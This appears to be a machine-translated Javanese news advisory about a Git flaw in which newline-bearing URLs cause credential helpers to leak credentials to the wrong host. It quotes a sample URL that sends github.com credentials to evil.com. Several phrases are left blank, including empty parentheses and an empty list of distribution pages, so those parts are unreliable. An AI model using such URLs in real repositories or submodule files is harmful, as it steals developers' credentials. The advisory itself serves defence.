rilis korektif saka sistem kontrol sumber sing disebarake Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 lan 2.17.4, ing kang ngilangi () ing pawang"", sing nyebabake kredensial dikirim menyang host sing salah nalika klien git ngakses repositori nggunakake URL format khusus sing ngemot karakter baris anyar. Kerentanan kasebut bisa digunakake kanggo ngatur kredensial saka host liyane supaya dikirim menyang server sing dikontrol dening panyerang.
Nalika nemtokake URL kaya "https://evil.com?%0ahost=github.com/", pawang kredensial nalika nyambung menyang host evil.com bakal ngliwati paramèter otentikasi sing ditemtokake kanggo github.com. Masalah kasebut dumadi nalika nindakake operasi kayata "git clone", kalebu ngolah URL kanggo submodules (contone, nindakake "git submodule update" bakal kanthi otomatis ngolah URL sing ditemtokake ing file .gitmodules saka repositori). Kerentanan paling mbebayani ing kahanan sing pangembang kloning repositori tanpa ndeleng URL, contone, nalika nggarap submodul, utawa ing sistem sing nindakake tumindak otomatis, contone, ing paket mbangun script.
Kanggo mblokir kerentanan ing versi anyar ngliwati karakter baris anyar ing sembarang nilai sing dikirim liwat protokol ijol-ijolan kredensial. Kanggo distribusi, sampeyan bisa nglacak rilis nganyari paket ing kaca , , , , , , .
Minangka workaround kanggo mblokir masalah Aja nggunakake credential.helper nalika ngakses repositori umum lan aja nggunakake "git clone" ing mode "--recurse-submodules" kanthi repositori sing ora dicenthang. Kanggo mateni credential.helper handler, sing ora lan njupuk sandhi saka , dilindhungi utawa file nganggo sandhi, sampeyan bisa nggunakake printah:
git config --unset credential.helper
git config --global --unset credential.helper
git config --system --unset credential.helper
Source: opennet.ru